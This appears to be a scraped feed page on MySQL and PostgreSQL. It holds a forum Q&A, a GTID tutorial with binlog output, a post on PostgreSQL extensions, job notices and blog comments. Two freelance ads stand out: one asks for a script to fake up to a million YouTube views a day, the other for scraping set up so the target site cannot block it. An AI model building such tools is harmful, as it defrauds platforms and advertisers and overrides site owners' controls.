    // loop on itself only if there are sockets still connected
    if (connectionsArray.length) {
      pollingTimer = setTimeout(pollingLoop, POLLING_INTERVAL);
      console.log("This is End Values");
      updateSockets({ users: users });
    }
  });

It's setting order.OrderKOT to empty. I know it has to be done with a callback in query.on('result'), but if I add one it doesn't fetch any result. The second query queryOrderKOT is working, but it fetches its values quite late and doesn't push them into order.OrderKOT. Please suggest how to fetch the values concurrently.

It is likely that the "end" event for the first query is occurring before the second queryOrderKOT query has had a chance to complete.

You should see the expected behavior if you move the main response logic from the "end" of query to the "end" or "result" of queryOrderKOT.
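As a rough sketch of that advice — using plain promises over mock in-memory data instead of the mysql module, so the table contents and helper names here are stand-ins — attach every order's child rows before emitting the final result:

```javascript
// Mock async "queries" standing in for the orderdish and tblorderkot tables.
const orders = [{ order_Id: 1 }, { order_Id: 2 }];
const kots = { 1: ['kot-a'], 2: ['kot-b', 'kot-c'] };

const queryOrders = () => Promise.resolve(orders.map(o => ({ ...o })));
const queryKotsFor = id => Promise.resolve(kots[id] || []);

async function loadOrders() {
  const rows = await queryOrders();
  // Wait for every per-order child query *before* returning,
  // so OrderKOT is never empty when the result is emitted.
  await Promise.all(rows.map(async order => {
    order.OrderKOT = await queryKotsFor(order.order_Id);
  }));
  return rows;
}

loadOrders().then(users => {
  console.log(JSON.stringify(users));
  // prints [{"order_Id":1,"OrderKOT":["kot-a"]},{"order_Id":2,"OrderKOT":["kot-b","kot-c"]}]
});
```

The same shape works with real queries by wrapping each db.query call in a promise (or using a promise-based client) and only calling updateSockets once Promise.all resolves.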


          databases/courier-authlib-mysql - 0.69.0      Cache   Translate Page      
- Update devel/courier-unicode to 2.1 - Convert to USES localbase - Update mail/cone to 1.0 [1] - Update mail/courier-imap to 5.0.0 - Add LICENSE - Update mail/maildrop to 3.0.0 - Remove IDN option since it's now mandatory - Update mail/sqwebmail to 6.0.0 [2] - Update security/courier-authlib to 0.69.0 - Add note to UPDATING - Silence some portlint warnings PR: 231471 [1] Submitted by: me Approved by: Maintainer timeout [1], oliver@ [2] Differential Revision: https://reviews.freebsd.org/D17234
          odoo item import      Cache   Translate Page      
I have a lot of items that i need to import into odoo erp, they are roughly about 1,5000 items with the following variants Brand: Size: Bolt Pattern: Offset: B/S: Finish: Center Bore: Load Rating: Lip... (Budget: $30 - $250 USD, Jobs: ERP, MySQL, PostgreSQL, Python, Software Architecture)
          Free PBX hotel PMS integration      Cache   Translate Page      
We are looking for a person who can write some scripts to integrate our FreePBX server with a hotel property management system. (Budget: $250 - $750 USD, Jobs: Asterisk PBX, MySQL, PHP, Software Architecture, VoIP)
          HealthWalk(헬스워크) - 박상철 (팀노바 Applied Level 2 project)      Cache   Translate Page      
<Title> HealthWalk(헬스워크) <Description> A service that provides gym location information and includes a pedometer <Technologies used> • Language: Java, PHP • OS: Android, Linux (Ubuntu) • Web Server: Apache • Database: MySQL • Protocol: HTTP, TCP • API: Daum Maps API • Libraries: gson, tedpermission, circleimageview, picasso, glide, volley, okhttp, slidinguppanel, crop, stetho, firebase-core, firebase-messaging, eazegraph, MPAndroidChart <Features> - Sign-up, login and profile settings • On sign-up, members register as either a business member or a general member • Business members can register their own gym to promote it - 걸.......
          Free PBX hotel PMS intergration      Cache   Translate Page      
We are looking for a person that can write some scripts to integrate our Free PBX server to integrate with a hotel property Management system. (Budget: $250 - $750 USD, Jobs: Asterisk PBX, MySQL, PHP, Software Architecture, VoIP)
          Need a HR YT Views script . Script can be made in javascript or php . ( I must be able to put it on a website of mine where I have traffic ) . Script has to work like the example below.      Cache   Translate Page      
Example of a script that used to work but not working now: [url removed, login to view] Must be able to deliver even 1 mil views in a day . Traffic source can be Suggested Videos or Facebook, Reddit ... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          MySQL GTID vs MariaDB GTID      Cache   Translate Page      

MySQL supports three binlog formats. For safer binlog-based replication it is recommended to use ROW-based replication, but even then some worst cases can lead to data inconsistency. Later, MySQL introduced the concept of GTID (global transaction identifiers), which assigns a unique identifier to each binlog transaction to avoid data inconsistency. This feature is supported in MySQL 5.6+. Percona Server for MySQL uses the same GTID structure as MySQL, but MariaDB's GTID is a bit different.


MySQL GTID vs MariaDB GTID

As a DBA, I have worked a lot with MySQL replication and troubleshooting, but not much with GTID. I got stuck in a migration because of GTID, and confirmed the possibilities with a friend of mine from mydbops. Then I started to understand GTID in MySQL and MariaDB more deeply, and after that I thought it was worth sharing.

What is the Purpose of GTID?

GTID generates a globally unique transaction ID for each transaction. Let's see a simple example. You are going to replicate a database from server M to server S. You have set the master binlog to binlog-00001 and its position to 120. Somewhere after binlog position 150 the replication broke, and by mistake you told the slave to start replication from 120 again. This re-applies all the transactions from binlog position 120, which may lead to duplicate records.

But GTID gives each transaction a unique ID. If you start replication from the GTID XXX:120, the slave keeps track of the GTIDs it has already applied, so if we try to re-apply those transactions it will not accept the duplicate records.
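As a sketch of the practical difference on the slave (the host name here is a placeholder): with GTID you let auto-positioning decide what to fetch instead of naming a file and position:

```sql
-- File/position replication: wrong coordinates can re-apply transactions
CHANGE MASTER TO MASTER_HOST='master.example',
  MASTER_LOG_FILE='binlog-00001', MASTER_LOG_POS=120;

-- GTID auto-positioning (MySQL 5.6+): the slave's applied GTID set is
-- compared against the master's, so already-applied transactions are skipped
CHANGE MASTER TO MASTER_HOST='master.example', MASTER_AUTO_POSITION=1;
START SLAVE;
```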

GTID in MySQL:

In MySQL, a GTID has two portions. The first portion is the server UUID, a 32-character random string taken from the auto.cnf file located in the MySQL data directory. The second portion is the sequence number.

Example:

2defbe5b-a6b7-11e8-8882-42010a8e0008:10

If you have a single master, then on the slave the GTID set is represented as a single expression.

Example:

2defbe5b-a6b7-11e8-8882-42010a8e0008:1-10

This means that transactions 1 to 10 originated from the server with the UUID 2defbe5b-a6b7-11e8-8882-42010a8e0008.

Let's do some tests:

Prepare a database with a table.

mysql -u root -ppass

create database sqladmin;
use sqladmin;
create table binlog (number int);

mysql> insert into binlog values (1);
Query OK, 1 row affected (0.03 sec)
mysql> insert into binlog values (2);
Query OK, 1 row affected (0.01 sec)
mysql> insert into binlog values (3);
Query OK, 1 row affected (0.02 sec)

Now open your binlog file with the following command.

mysqlbinlog mysql-bin-00001 --base64-output=DECODE-ROWS --verbose

#180823 15:39:43 server id 1111 end_log_pos 124 CRC32 0x0d3ba090 Start: binlog v 4, server v 8.0.12 created 180823 15:39:43 at startup
SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:8'/*!*/;
#180823 15:40:14 server id 1111 end_log_pos 349 CRC32 0x3d311ee1 Query thread_id=8 exec_time=0 error_code=0
BEGIN
#180823 15:40:14 server id 1111 end_log_pos 445 CRC32 0xf547477c Write_rows: table id 66 flags: STMT_END_F
### INSERT INTO `sqladmin`.`binlog`
### SET
###   @1=1
# at 445
#180823 15:40:14 server id 1111 end_log_pos 476 CRC32 0x2fb15a52 Xid = 9
COMMIT/*!*/;
SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:9'/*!*/;
#180823 15:40:17 server id 1111 end_log_pos 630 CRC32 0x26771dff Query thread_id=8 exec_time=0 error_code=0
BEGIN
#180823 15:40:17 server id 1111 end_log_pos 726 CRC32 0x7b5b1883 Write_rows: table id 66 flags: STMT_END_F
### INSERT INTO `sqladmin`.`binlog`
### SET
###   @1=2
# at 726
#180823 15:40:17 server id 1111 end_log_pos 757 CRC32 0x8d0cdb14 Xid = 10
COMMIT/*!*/;
SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:10'/*!*/;
#180823 15:40:19 server id 1111 end_log_pos 911 CRC32 0x3c7ef0dc Query thread_id=8 exec_time=0 error_code=0
BEGIN
#180823 15:40:19 server id 1111 end_log_pos 1007 CRC32 0xbd02976b Write_rows: table id 66 flags: STMT_END_F
### INSERT INTO `sqladmin`.`binlog`
### SET
###   @1=3
# at 1007
#180823 15:40:19 server id 1111 end_log_pos 1038 CRC32 0x1a7f559f Xid = 11
COMMIT/*!*/;
#180823 15:40:40 server id 1111 end_log_pos 1113 CRC32 0xbd91558b GTID last_committed=3 sequence_number=4 rbr_only=yes original_committed_timestamp=1535038840931969 immediate_commit_timestamp=1535038840931969 transaction_length=473
SET @@SESSION.GTID_NEXT= '2defbe5b-a6b7-11e8-8882-42010a8e0008:11'/*!*/;
#180823 15:40:29 server id 1111 end_log_pos 1192 CRC32 0x66184d4c Query thread_id=8 exec_time=0 error_code=0
BEGIN
#180823 15:40:29 server id 1111 end_log_pos 1248 CRC32 0x3ecc40d8 Table_map: `sqladmin`.`binlog` mapped to number 66
#180823 15:40:29 server id 1111 end_log_pos 1288 CRC32 0x91460ce6 Write_rows: table id 66 flags: STMT_END_F
### INSERT INTO `sqladmin`.`binlog`
### SET
###   @1=4
### INSERT INTO `sqladmin`.`binlog`
### SET
###   @1=5
### INSERT INTO `sqladmin`.`binlog`
### SET
###   @1=6
#180823 15:40:40 server id 1111 end_log_pos 1511 CRC32 0x8f1c4a0a Xid = 13
COMMIT/*!*/;
SET @@SESSION.GTID_NEXT= 'AUTOMATIC' /* added by mysqlbinlog */ /*!*/;
DELIMITER ;
# End of log file
/*!50003 SET COMPLETION_TYPE=@OLD_COMPLETION_TYPE*/;
/*!50530 SET @@SESSION.PSEUDO_SLAVE_MODE=0*/;
MySQL GTID vs MariaDB GTID

Limitations:

  • If you are using MySQL 5.6, you must restart the server to enable GTID. In MySQL 5.7 it can be done online.
  • If you are using replication without GTID, you need to enable GTID on the master first, then on the slave.
  • The master and slave must have different UUIDs in auto.cnf.

GTID in MariaDB:

Unlike MySQL, MariaDB has implemented a new type of GTID with three portions. We do not need to restart the server to enable GTID in MariaDB.


MySQL GTID vs MariaDB GTID (Source: MariaDB)

Domain ID:

If you are using multi-master replication — say a 3-node setup — each group commit must be applied in a consistent order in the binlog on the other servers. Suppose you are inserting 3 records on each node. Due to a network issue, Node 3 gets disconnected; meanwhile, Node 2 executes a DROP TABLE command and some sessions keep inserting data on Node 3. When the network issue is resolved, Node 3 has lost track of where it should resume replicating and whose data should be applied first. The domain ID solves this: the slave knows where to resume the transaction stream for Node 1 and Node 2 independently.

Server ID:

This is the mysql’s parameter server-id. This is its second portionwhere the event group is first logged into the binlog.

Sequence:

This is the same as MySQL's sequence number.
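A short sketch of how the three portions surface in MariaDB (the host name is a placeholder):

```sql
-- Current position, e.g. 0-1111-3 = domain-server_id-sequence
SELECT @@GLOBAL.gtid_current_pos;

-- Replicate from the GTID position the slave has already applied
CHANGE MASTER TO MASTER_HOST='master.example', MASTER_USE_GTID=slave_pos;
START SLAVE;
```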

Testing with MariaDB:

mysql -u root -ppass

create database sqladmin_mariadb;
use sqladmin_mariadb;
create table binlog_mariadb (number int);

MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (1);
Query OK, 1 row affected (0.004 sec)
MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (2);
Query OK, 1 row affected (0.003 sec)
MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (3);
Query OK, 1 row affected (0.003 sec)
MariaDB [sqladmin_mariadb]> start transaction;
Query OK, 0 rows affected (0.000 sec)
MariaDB [sqladmin_mariadb]> insert into binlog_mariadb values (4);
Query OK, 1 row affected (0.
          Una ayuda, please      Cache   Translate Page      
I'm trying to convert a mysql tutorial to mysqli, but one function is giving me trouble. The program splits the screen in 2: in the part...
          Tax Department API Link with POS System      Cache   Translate Page      
We have new regulations in Costa Rica that require transaction data to be sent to the Tax Department and the customer simultaneously (if the customer opts in to receive a digital receipt) within 3 hours of the transaction taking place... (Budget: $250 - $750 USD, Jobs: MySQL, PHP, Software Architecture, SQL, XML)
          Reply To: Copying a site without access to the MySQL export      Cache   Translate Page      

<< Error establishing a database connection >>

One of the DB parameters in your wp-config.php file is incorrect.


          PHP - Module Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
Total 6 – 8 years related experience in IT • Professional experience in PHP/MySQL (LAMP) stack development – 5 years ( 7 for senior) • Professional experience...
From Mphasis - Thu, 27 Sep 2018 12:28:53 GMT - View all Bengaluru, Karnataka jobs
          Scrape Website Data      Cache   Translate Page      
I need data scraped from a website and deposited into a MySQL database. I can be flexible with the programming language for scraping... I need to make sure that the website cannot block the server from scraping the data, so we may need to set up proxies and different things to protect from that... (Budget: $10 - $30 USD, Jobs: MySQL, PHP, Python, Software Architecture, Web Scraping)
          Desarrollador Web - PCA Ingenieria - Palmira, Valle del Cauca      Cache   Translate Page      
Se busca desarrollador web, experiencia trabajando con PHP, MySQL, CSS y Javascript. Ideal que haya trabajado con algún framework PHP, XML, json, API REST....
De PCA Ingenieria - Sat, 22 Sep 2018 16:32:33 GMT - Ver todos: empleos en Palmira, Valle del Cauca
          Introducing our step-by-step guide on how to import your website to WordPress      Cache   Translate Page      
We just published a full-length tutorial on How to Migrate from Custom Database Design into WordPress. If you’ve built sites that have custom PHP and MySQL tables, this guide will teach you how to convert them into a WordPress site. Migrating from custom database tables is a complex task. Our guide talks you through it, […]
          Avinash Kumar: PostgreSQL Extensions for an Enterprise-Grade System      Cache   Translate Page      

In the current series of blog posts we have been discussing various relevant aspects of building an enterprise-grade PostgreSQL setup, such as security, backup strategy, high availability, and different methods to scale PostgreSQL. In this blog post, we review some of the most popular open source extensions for PostgreSQL, used to expand its capabilities and address specific needs. We'll cover some of them during a demo in our upcoming webinar on October 10.

Expanding with PostgreSQL Extensions

PostgreSQL is one of the world's most feature-rich and advanced open source RDBMSs. Its features are not limited to those released by the community through major/minor releases: there are hundreds of additional features developed using the extension capabilities in PostgreSQL, which can cater to the needs of specific users. Some of these extensions are very popular and useful for building an enterprise-grade PostgreSQL environment. We previously blogged about a couple of FDW extensions (mysql_fdw and postgres_fdw) which allow PostgreSQL databases to talk to remote homogeneous/heterogeneous databases like PostgreSQL, MySQL, MongoDB, etc. We will now cover a few other additional extensions that can expand your PostgreSQL server capabilities.

pg_stat_statements

The pg_stat_statements module provides a means for tracking execution statistics of all SQL statements executed by a server. The statistics gathered by the module are made available via a view named pg_stat_statements. This extension must be installed in each of the databases you want to track, and like many of the extensions in this list, it is available in the contrib package from the PostgreSQL PGDG repository.
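
As a quick sketch of typical use (this assumes shared_preload_libraries already includes pg_stat_statements; the column names match the PostgreSQL 10-era view):

```sql
CREATE EXTENSION pg_stat_statements;

-- Top five statements by cumulative execution time
SELECT query, calls, total_time, rows
  FROM pg_stat_statements
 ORDER BY total_time DESC
 LIMIT 5;
```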

pg_repack

Tables in PostgreSQL may end up with fragmentation and bloat due to the specific MVCC implementation in PostgreSQL, or simply due to a high number of rows being naturally removed. This could lead not only to unused space being held inside the table but also to sub-optimal execution of SQL statements. pg_repack is the most popular way to address this problem, reorganizing and repacking the table. It can reorganize the table's content without placing an exclusive lock on it during the process: DMLs and queries can continue while repacking is happening. Version 1.2 of pg_repack introduces new features such as parallel index builds and the ability to rebuild just the indexes. Please refer to the official documentation for more details.

pgaudit

PostgreSQL has a basic statement logging feature. It can be implemented using the standard logging facility with log_statement = all. But this is not sufficient for many audit requirements. One of the essential features for enterprise deployments is the capability for fine-grained auditing of the user interactions/statements issued to the database. This is a major compliance requirement for many security standards. The pgaudit extension caters to these requirements.

The PostgreSQL Audit Extension (pgaudit) provides detailed session and/or object audit logging via the standard PostgreSQL logging facility. Please refer to the settings section of its official documentation for more details.
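
A minimal sketch of enabling it (pgaudit must first be added to shared_preload_libraries and the server restarted; the log classes shown are just an example):

```sql
-- postgresql.conf: shared_preload_libraries = 'pgaudit'  (restart required)
CREATE EXTENSION pgaudit;

-- Audit all DDL and data-modifying statements in this session
SET pgaudit.log = 'ddl, write';

CREATE TABLE audit_demo (id int);  -- now emitted to the log as an AUDIT: SESSION entry
```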

pldebugger

This is a must-have extension for developers who work on stored functions written in PL/pgSQL. This extension is well integrated with GUI tools like pgAdmin, allowing developers to step through their code and debug it. Packages for pldebugger are also available in the PGDG repository and installation is straightforward. Once it is set up, we can step through and debug the code remotely.

The official git repo is available here

plprofiler

This is a wonderful extension for finding out where the code is slowing down. This is very helpful, particularly during complex migrations from proprietary databases, like from Oracle to PostgreSQL, which affect application performance. This extension can prepare a report on the overall execution time, in both tabular representation and flamegraphs, with clear information about each line of code. This extension is not, however, available from the PGDG repo: you will need to build it from source. Details on building and installing plprofiler will be covered in a future blog post. Meanwhile, the official repository and documentation are available here

PostGIS

PostGIS is arguably the most versatile implementation of the specifications of the Open Geospatial Consortium. We can see a large list of features in PostGIS that are rarely available in any other RDBMSs.

There are many users who have primarily opted to use PostgreSQL because of the features supported by PostGIS. In fact, all these features are not implemented as a single extension, but are instead delivered by a collection of extensions. This makes PostGIS one of the most complex extensions to build from source. Luckily, everything is available from the PGDG repository:

$ sudo yum install postgis24_10.x86_64

Once the postgis package is installed, we are able to create the extensions on our target database:

postgres=# CREATE EXTENSION postgis;
CREATE EXTENSION
postgres=# CREATE EXTENSION postgis_topology;
CREATE EXTENSION
postgres=# CREATE EXTENSION postgis_sfcgal;
CREATE EXTENSION
postgres=# CREATE EXTENSION fuzzystrmatch;
CREATE EXTENSION
postgres=# CREATE EXTENSION postgis_tiger_geocoder;
CREATE EXTENSION
postgres=# CREATE EXTENSION address_standardizer;
CREATE EXTENSION

Language Extensions: PL/Python, PL/Perl, PL/V8, PL/R, etc.

Another powerful feature of PostgreSQL is its programming languages support. You can code database functions/procedures in pretty much every popular language.

Thanks to the enormous number of libraries available, which include machine learning ones, and to its vibrant community, Python has claimed the third spot amongst the most popular languages of choice according to the TIOBE Programming index. Your team's skills and libraries remain valid for PostgreSQL server coding too! Teams that regularly code in JavaScript for Node.js or Angular can easily write PostgreSQL server code in PL/V8. All of the packages required are readily available from the PGDG repository.
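
For instance, the classic example from the PostgreSQL documentation, a function written in PL/Python (requires the plpython3u package to be installed):

```sql
CREATE EXTENSION plpython3u;

CREATE FUNCTION pymax (a integer, b integer)
RETURNS integer AS $$
  return max(a, b)
$$ LANGUAGE plpython3u;

SELECT pymax(2, 3);   -- returns 3
```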

cstore_fdw

cstore_fdw is an open source columnar store extension for PostgreSQL. Columnar stores provide notable benefits for analytics use cases where data is loaded in batches. cstore_fdw's columnar nature delivers performance by only reading relevant data from disk, and it may compress data by 6 to 10 times to reduce space requirements for data archiving. The official repository and documentation are available here
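
Usage follows the standard FDW pattern; a sketch based on the project's README (the table and column names are made up for illustration):

```sql
CREATE EXTENSION cstore_fdw;
CREATE SERVER cstore_server FOREIGN DATA WRAPPER cstore_fdw;

CREATE FOREIGN TABLE events_archive (
    event_time  timestamptz,
    customer_id int,
    payload     text
) SERVER cstore_server
  OPTIONS (compression 'pglz');
```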

HypoPG

HypoPG is an extension for adding support for hypothetical indexes – that is, without actually adding the index. This helps us to answer questions such as “how will the execution plan change if there is an index on column X?”. Installation and setup instructions are part of its official documentation
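
A short sketch of the idea (orders is a hypothetical table used only for illustration):

```sql
CREATE EXTENSION hypopg;

-- Register a hypothetical index; nothing is written to disk
SELECT * FROM hypopg_create_index('CREATE INDEX ON orders (customer_id)');

-- A plain EXPLAIN (without ANALYZE) will now consider the hypothetical index
EXPLAIN SELECT * FROM orders WHERE customer_id = 42;
```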

mongo_fdw

mongo_fdw presents collections from MongoDB as tables in PostgreSQL. This is a case where the NoSQL world meets the SQL world and their features combine. We will be covering this extension in a future blog post. The official repository is available here
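
A rough sketch of the setup, based on the options documented in the project's README (the host, credentials, database, and collection names are placeholders):

```sql
CREATE EXTENSION mongo_fdw;

CREATE SERVER mongo_srv FOREIGN DATA WRAPPER mongo_fdw
  OPTIONS (address '127.0.0.1', port '27017');

CREATE USER MAPPING FOR postgres SERVER mongo_srv
  OPTIONS (username 'mongo_user', password 'secret');

CREATE FOREIGN TABLE warehouse (
    _id   name,
    item  text,
    qty   int
) SERVER mongo_srv
  OPTIONS (database 'db', collection 'warehouse');
```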

tds_fdw

Another important FDW (foreign data wrapper) extension in the PostgreSQL world is tds_fdw. Both Microsoft SQL Server and Sybase use the TDS (Tabular Data Stream) format. This FDW allows PostgreSQL to use tables stored in a remote SQL Server or Sybase database as local tables. It makes use of the FreeTDS libraries.
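
Setup is analogous to other FDWs; a sketch with placeholder connection details, following the option names in the tds_fdw documentation:

```sql
CREATE EXTENSION tds_fdw;

CREATE SERVER mssql_srv FOREIGN DATA WRAPPER tds_fdw
  OPTIONS (servername '192.168.1.10', port '1433', database 'sales');

CREATE USER MAPPING FOR postgres SERVER mssql_srv
  OPTIONS (username 'sa', password 'secret');
```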

orafce

As previously mentioned, there are a lot of migrations underway from Oracle to PostgreSQL. Incompatible functions in PostgreSQL are often painful for those migrating server code. The orafce project implements some of the functions from the Oracle database. The functionality was verified on Oracle 10g, and the module is useful for production work. Please refer to the list in its official documentation of the Oracle functions implemented in PostgreSQL
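
Once installed, familiar Oracle functions become available; two small examples (depending on the orafce version, some functions live in the oracle schema, so you may need to adjust search_path):

```sql
CREATE EXTENSION orafce;

SELECT add_months(date '2018-01-31', 1);  -- Oracle semantics: end of month maps to end of month
SELECT nvl(NULL::text, 'default');        -- 'default'
```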

TimescaleDB

In this new world of IoT and connected devices, there is a growing need for time-series data stores. TimescaleDB can convert PostgreSQL into a scalable time-series data store. The official site is available here with all relevant links.
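
The canonical example from the Timescale documentation turns a plain table into a hypertable partitioned on its time column:

```sql
CREATE EXTENSION timescaledb;

CREATE TABLE conditions (
    time        timestamptz NOT NULL,
    device_id   text,
    temperature double precision
);

-- Convert it into a hypertable, automatically chunked by time
SELECT create_hypertable('conditions', 'time');
```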

pg_bulkload

Is loading large volumes of data into a database efficiently and quickly a challenge for you? If so, pg_bulkload may help you solve that problem. Official documentation is available here

pg_partman

PostgreSQL 10 introduced declarative partitioning. But creating new partitions and maintaining existing ones, including purging unwanted partitions, requires a good dose of manual effort. If you are looking to automate part of this maintenance you should have a look at what pg_partman offers. The repository with documentation is available here.
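
As a sketch, maintenance of a daily-partitioned table can be delegated to pg_partman like this (table and column names are placeholders; the 'native' type uses PostgreSQL 10 declarative partitioning):

```sql
CREATE SCHEMA partman;
CREATE EXTENSION pg_partman SCHEMA partman;

-- Let pg_partman create and maintain daily partitions of log_events
SELECT partman.create_parent('public.log_events', 'created_at', 'native', 'daily');
```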

wal2json

PostgreSQL has logical replication features built in. Extra information is recorded in the WALs, which facilitates logical decoding, and wal2json is a popular output plugin for logical decoding. This can be utilized for different purposes, including change data capture. In addition to wal2json, there are other output plugins: a concise list is available in the PostgreSQL wiki.
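
A minimal decoding session looks like this (requires wal_level = logical; the accounts table is illustrative):

```sql
-- Create a logical replication slot that emits JSON
SELECT * FROM pg_create_logical_replication_slot('demo_slot', 'wal2json');

INSERT INTO accounts VALUES (1, 'alice');

-- Consume the accumulated changes as JSON documents
SELECT data FROM pg_logical_slot_get_changes('demo_slot', NULL, NULL);

SELECT pg_drop_replication_slot('demo_slot');
```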

There are many more extensions that help us build an enterprise-grade PostgreSQL set up using open source solutions. Please feel free to comment and ask us if we know about one that satisfies your particular needs. Or, if there’s still time, sign up for our October webinar and ask us in person!

The post PostgreSQL Extensions for an Enterprise-Grade System appeared first on Percona Database Performance Blog.


          AMTRON Recruitment 2018 18 Systems Assistant Posts       Cache   Translate Page      
AMTRON Recruitment 2018-2019 | AMTRON invites online applications for 18 Systems Officer and Systems Assistant posts. The AMTRON Systems Officer, Systems Assistant jobs notification 2018 has been released. AMTRON invites online applications for appointment to the following Systems Officer and Systems Assistant posts in Assam Electronics Development Corporation Ltd. Submission of applications opens on 09.10.2018 and closes on 23.10.2018. You can check here the AMTRON recruitment eligibility criteria, pay scale, application fee/exam fee, selection process, how to apply, syllabus, question paper, admit card release date, exam date, result release date and other rules, all given below... Aspirants are requested to go through the latest AMTRON job recruitment 2018 notification fully before applying to this job.

AMTRON Recruitment 2018 Notification Highlights:
Organization Name: Assam Electronics Development Corporation Ltd
Job Category: Assam Govt Jobs
No. of Posts: 18 Vacancies
Name of the Posts: Systems Officer, Systems Assistant & Various Posts
Job Location: Assam
Selection Procedure: Written Exam, Interview
Application Apply Mode: Online
Official Website: www.amtron.in
Starting Date: 09.10.2018
Last Date: 23.10.2018

AMTRON Recruitment 2018 Vacancy Details:
AMTRON invites applications for the following posts:
1. Systems Officer, Systems Assistant: 18 posts
Total: 18 posts

Eligibility Criteria for AMTRON Systems Officer, Systems Assistant:
As per the recent AMTRON notification 2018, the eligibility details like Educational Qualification & Age Limit for the Systems Officer, Systems Assistant job has given below.
Educational Qualification:
1. Systems Officer: BE or B.Tech (Computer Science/ Information Technology/ Electronics & Communication/ Electronics & Telecommunication/ Electronics & Instrumentation/ Electronics & Electricals/ Telecommunication/ Instrumentation) or MCA or MSc (Computer Science/ Information Technology/ Electronics & Communication/ Electronics & Telecommunication/ Electronics & Instrumentation/ Electronics & Electricals/ Telecommunication/ Instrumentation) + 1 year of experience in software development in a PHP/Java and PostgreSQL/MySQL environment, Android and iOS mobile app development, and technical troubleshooting & support in hardware/software implementation.
2. Systems Assistant: B.C.A or B.Sc. (Physics/Mathematics) with a 1-year Post Graduate Diploma in Computer Science/Applications, or DOEACC 'A' Level, or Diploma holders (3 years) from a Polytechnic in Computer Science/Engineering + knowledge of server administration/LAN/DBA/technical troubleshooting support in hardware.

Age Limit:
For Gen/UR candidates: 28 years
The upper age limit is relaxed by 5 years for SC/ST; 3 years for OBC; 10 years for Persons with Disabilities (15 years for SC/ST PWDs & 13 years for OBC PWDs); and for Ex-Servicemen as per Govt. of India rules. Relaxation in the upper age limit will be provided as per Govt. rules. Go through the AMTRON official notification 2018 for more reference.

Salary Details:
1. Systems Officer: Monthly fixed pay Rs. 15985.00; EPF contribution per month Rs. 3600.00
2. Systems Assistant: Monthly fixed pay Rs. 10750.00; EPF contribution per month Rs. 2580.00


AMTRON Systems Officer, Systems Assistant Selection Procedure:
AMTRON may follow the following process to select candidates:
1. Written Exam
2. Interview
How to apply AMTRON Systems Officer, Systems Assistant Vacancy?  
Candidates satisfying the above eligibility conditions should use the following procedure to apply online:
Step 1: Log on to AMTRON Careers Page at official website to www.amtron.in
Step 2: Eligible candidates are advised to open Notification
Step 3: Read the Advertisement carefully to be sure about your eligibility
Step 4: Click on “Click here for New Registration”, if you are a new user.
Step 5: Fill your Academic Qualification & Other Related Information as per the instructions
Step 6: Ensure the information provided is correct
Step 7: Complete the Registration & Click on “Submit” & Make Payments
Step 8: Take a print out of online application for future use.
Important Dates to Remember:
Starting Date for Submission of Application: 09.10.2018
Last Date for Submission of Application: 23.10.2018
Date of Examination: Nov/Dec 2018

AMTRON Important Links:
Online Application & Official Notification Links:
AMTRON Official Website Career Page
AMTRON Official Notification PDF
AMTRON Online Application Form

          very professional server administrator      Cache   Translate Page      
I am looking for a professional server administrator, ideally one who knows how to work well and answer problems quickly, and who knows PrestaShop: an expert at PrestaShop who knows how to build models and fix ... (Budget: $10 - $300 USD, Jobs: HTML, MySQL, PHP, Prestashop)
          Install DVWA (Damn Vulnerable Web Application) in Kali Linux – Detailed Tutorial      Cache   Translate Page      

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to aid teachers/students in teaching/learning web application security in […]

The post Install DVWA (Damn Vulnerable Web Application) in Kali Linux – Detailed Tutorial appeared first on Yeah Hub.


          Comment on Finding Table Differences on Nullable Columns Using MySQL Generated Columns by Guilhem Bichot      Cache   Translate Page      
Hello. The original problem, that two rows with the same NULL value are not considered equal (and thus are false positives in the first difference-finding query), is because the USING clause implicitly translates to equality conditions, which reject NULLs; it can be solved by using an ON clause with the NULL-safe equality operator <=>. Instead of: sbtest1 a left join sbtest2 b using (k,c,pad) where b.id is null, do: sbtest1 a left join sbtest2 b on a.k <=> b.k and a.c <=> b.c and a.pad <=> b.pad where b.id is null. Guilhem (MySQL dev team)
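
A minimal illustration of why this matters in MySQL: ordinary equality yields NULL when either side is NULL, while the NULL-safe operator <=> treats two NULLs as equal:

```sql
SELECT NULL = NULL;    -- NULL (unknown), so the join condition fails
SELECT NULL <=> NULL;  -- 1
SELECT 1 <=> NULL;     -- 0
```
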
          Comment on PostgreSQL Monitoring: Set Up an Enterprise-Grade Server (and Sign Up for Webinar Weds 10/10…) by Paul      Cache   Translate Page      
Hi Avinash/Nando/Jobin, maybe I wasn't able to catch up with DDLs, but what's the best way to handle DDL? In MySQL, we can use pt-online-schema-change and avoid large replica lag. Is there a way to do this without downtime in Postgres, or is there a tool Percona is writing right now that would be equivalent to pt-online-schema-change? Looking forward on this.
          Comment on Persistence of autoinc fixed in MySQL 8.0 by Federico Razzoli      Cache   Translate Page      
In my understanding, replacing REPLACE with DELETE + INSERT should also avoid the problem. Correct? If so, and if adding the DELETE is a problem for developers, DELETE could also be added in a trigger.
          Comment on Announcement: Experimental Build of Percona XtraBackup 8.0 by jtomaszon      Cache   Translate Page      
Wonder why we are not making it backward compatible with previous versions. It would not be so difficult to check which MySQL version we are trying to back up and just use one or the other.
          Comment on Finding Table Differences on Nullable Columns Using MySQL Generated Columns by David Ducos      Cache   Translate Page      
Hi Jouni, thank you for your comment! I chose MD5 for no particular reason, as later in the customer's process there is a second validation. Feel free to choose any hash function that suits your needs best. Cheers
          Comment on MySQL Session variables and Hints by Oğuzhan Hoca      Cache   Translate Page      
The other approach is session variables. If you know a query is going to require a large sort, you can do SET sort_buffer_size=50000000 before executing the query and SET sort_buffer_size=DEFAULT after executing it.
          Comment on MySQL Session variables and Hints by Zelal Keleş      Cache   Translate Page      
Thanks for this article, I use it on my website.
          Comment on MySQL Session variables and Hints by Serdar Yüce      Cache   Translate Page      
thanks for this article.
          Comment on MySQL Session variables and Hints by Anaşehir Koleji      Cache   Translate Page      
I used it in my project last time.
